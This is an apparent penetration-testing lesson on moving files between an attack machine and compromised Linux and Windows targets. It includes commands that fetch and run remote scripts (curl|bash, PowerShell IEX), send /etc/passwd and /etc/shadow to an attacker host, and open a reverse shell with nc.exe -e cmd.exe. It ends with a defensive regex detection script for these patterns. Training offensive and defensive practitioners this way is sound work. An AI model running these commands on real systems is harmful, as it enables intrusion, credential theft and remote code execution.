Vulnerability Analysis & Exploitation
File Transfer Techniques
Moving files between your attack machine and targets is essential. This lesson covers reliable methods for both Linux and Windows targets.
Setting Up File Servers
Python HTTP Server (Most Common)
```bash
# Python 3
python3 -m http.server 80
# Python 2
python -m SimpleHTTPServer 80
# Serve a specific directory
cd /usr/share/windows-binaries
python3 -m http.server 80
```
PHP Development Server
```bash
php -S 0.0.0.0:80
```
Apache (Persistent)
```bash
# Start Apache
sudo systemctl start apache2
# Copy files to the web root
sudo cp file.exe /var/www/html/
```
Linux File Transfers
wget
```bash
# Download file
wget http://10.10.14.5/linpeas.sh
# Save under a different name
wget http://10.10.14.5/linpeas.sh -O /tmp/lp.sh
# Execute directly (without saving)
wget -qO- http://10.10.14.5/linpeas.sh | bash
```
curl
```bash
# Download file
curl http://10.10.14.5/linpeas.sh -o linpeas.sh
# Execute directly
curl http://10.10.14.5/linpeas.sh | bash
# Download silently
curl -s http://10.10.14.5/linpeas.sh -o linpeas.sh
```
Netcat File Transfer
```bash
# Receiving end (your machine)
nc -lvnp 4444 > received_file
# Sending end (target)
nc -w 3 10.10.14.5 4444 < /etc/passwd
```
SCP (If SSH Available)
```bash
# Copy to target
scp linpeas.sh user@10.10.10.10:/tmp/
# Copy from target
scp user@10.10.10.10:/etc/passwd ./
```
Base64 Encoding (No Tools)
```bash
# On attacker: encode file (-w 0 disables line wrapping)
base64 -w 0 shell.elf > shell.b64
cat shell.b64 # Copy output
# On target: decode file
echo "base64_string_here" | base64 -d > shell.elf
chmod +x shell.elf
```
Windows File Transfers
PowerShell DownloadFile
```cmd
:: Download file
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.14.5/nc.exe','C:\Users\Public\nc.exe')"
:: Shorter version
powershell -c "iwr http://10.10.14.5/nc.exe -OutFile nc.exe"
:: Download and execute
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/script.ps1')"
```
certutil
```cmd
:: Download file
certutil -urlcache -split -f http://10.10.14.5/nc.exe nc.exe
:: Download to a specific path
certutil -urlcache -split -f http://10.10.14.5/nc.exe C:\Windows\Temp\nc.exe
```
Bitsadmin
```cmd
bitsadmin /transfer job /download /priority high http://10.10.14.5/nc.exe C:\Users\Public\nc.exe
```
SMB Server (Impacket)
```
# On attacker: start SMB server
impacket-smbserver share $(pwd) -smb2support
# On target (Windows)
copy \\10.10.14.5\share\nc.exe C:\Users\Public\nc.exe
# Or run directly
\\10.10.14.5\share\nc.exe -e cmd.exe 10.10.14.5 4444
```
SMB with Authentication
```
# Start server with auth
impacket-smbserver share $(pwd) -smb2support -user test -password test
# Connect on Windows
net use \\10.10.14.5\share /user:test test
copy \\10.10.14.5\share\file.exe .
```
Upload Methods
Uploading FROM Target
Linux - Netcat:
```bash
# Your machine listens
nc -lvnp 4444 > loot.txt
# Target sends
cat /etc/shadow | nc 10.10.14.5 4444
```
Linux - curl POST:
```bash
# Your machine (start listener)
nc -lvnp 80
# Target sends
curl -X POST -d @/etc/passwd http://10.10.14.5/
```
Windows - PowerShell:
```
# Your machine
nc -lvnp 80
# Target sends (-Raw keeps the file as one string so line breaks survive the POST)
powershell -c "$content = Get-Content -Raw C:\Users\user\Desktop\file.txt; Invoke-WebRequest -Uri http://10.10.14.5/ -Method POST -Body $content"
```
File Transfer Cheat Sheet
To Linux Targets
| Method | Command |
|---|---|
| wget | wget http://IP/file |
| curl | curl http://IP/file -o file |
| netcat | nc -lvnp PORT > file |
| scp | scp user@IP:/path/file . |
To Windows Targets
| Method | Command |
|---|---|
| PowerShell | iwr http://IP/file -OutFile file |
| certutil | certutil -urlcache -split -f http://IP/file file |
| SMB | copy \\IP\share\file . |
| bitsadmin | bitsadmin /transfer j /download http://IP/file file |
Quick Reference
```
# Start HTTP server
python3 -m http.server 80
# Start SMB server
impacket-smbserver share . -smb2support
# Linux download
wget http://10.10.14.5/file
curl http://10.10.14.5/file -o file
# Windows download
certutil -urlcache -split -f http://10.10.14.5/file file
powershell iwr http://10.10.14.5/file -OutFile file
copy \\10.10.14.5\share\file .
```
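Every transfer method on this page leaves a distinctive process command line on the target, which is what a blue team hunts for. The following is an added detection example, not part of the original lesson: it runs simple command-line rules for the certutil, bitsadmin, PowerShell and pipe-to-shell download patterns shown above over a constructed set of process-creation events (the event tuples and rule names are my own, not real telemetry or a vendor schema).

```python
import re

# Constructed sample process-creation events as (image, command line). Not real telemetry.
SAMPLE_EVENTS = [
    ("certutil.exe", "certutil -urlcache -split -f http://10.10.14.5/nc.exe nc.exe"),
    ("bitsadmin.exe", "bitsadmin /transfer job /download /priority high http://10.10.14.5/nc.exe C:\\Users\\Public\\nc.exe"),
    ("powershell.exe", "powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/script.ps1')\""),
    ("powershell.exe", "powershell -c \"iwr http://10.10.14.5/nc.exe -OutFile nc.exe\""),
    ("bash", "bash -c \"wget -qO- http://10.10.14.5/linpeas.sh | bash\""),
    # Benign look-alikes: same binaries, legitimate use, must not fire
    ("certutil.exe", "certutil -hashfile C:\\Windows\\Temp\\setup.msi SHA256"),
    ("bitsadmin.exe", "bitsadmin /list /allusers"),
    ("powershell.exe", "powershell -c \"Get-Content C:\\logs\\app.log\""),
]

# Rules: (name, image regex, command-line regex). Each mirrors one technique from the lesson.
RULES = [
    ("certutil_urlcache_download", r"certutil", r"-urlcache\b.*-f\b.*https?://"),
    ("bitsadmin_transfer_download", r"bitsadmin", r"/transfer\b.*/download\b.*https?://"),
    ("powershell_webclient_download", r"powershell|pwsh", r"Net\.WebClient.*Download(File|String)"),
    ("powershell_iwr_outfile", r"powershell|pwsh", r"\b(iwr|Invoke-WebRequest)\b.*-OutFile"),
    ("powershell_iex_download_cradle", r"powershell|pwsh", r"\bIEX\b.*Download"),
    ("shell_download_piped_to_shell", r"^(ba|z|da)?sh$", r"\b(wget|curl)\b.*\|\s*(ba|z|da)?sh\b"),
]


def classify(image, cmdline):
    """Return the names of all rules that match this event (empty list if none)."""
    hits = []
    for name, img_re, cmd_re in RULES:
        if re.search(img_re, image, re.I) and re.search(cmd_re, cmdline, re.I):
            hits.append(name)
    return hits


def scan(events):
    """Return [(cmdline, [rule names])] for every event that triggers at least one rule."""
    flagged = []
    for image, cmdline in events:
        hits = classify(image, cmdline)
        if hits:
            flagged.append((cmdline, hits))
    return flagged


if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(f"[{', '.join(hits)}] {cmdline}")
```

These are plain command-line heuristics, so a renamed binary or an encoded command will not match; treat them as a baseline to correlate with outbound HTTP/SMB connections from hosts that normally make none.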
Next, we'll cover password attacks and credential harvesting.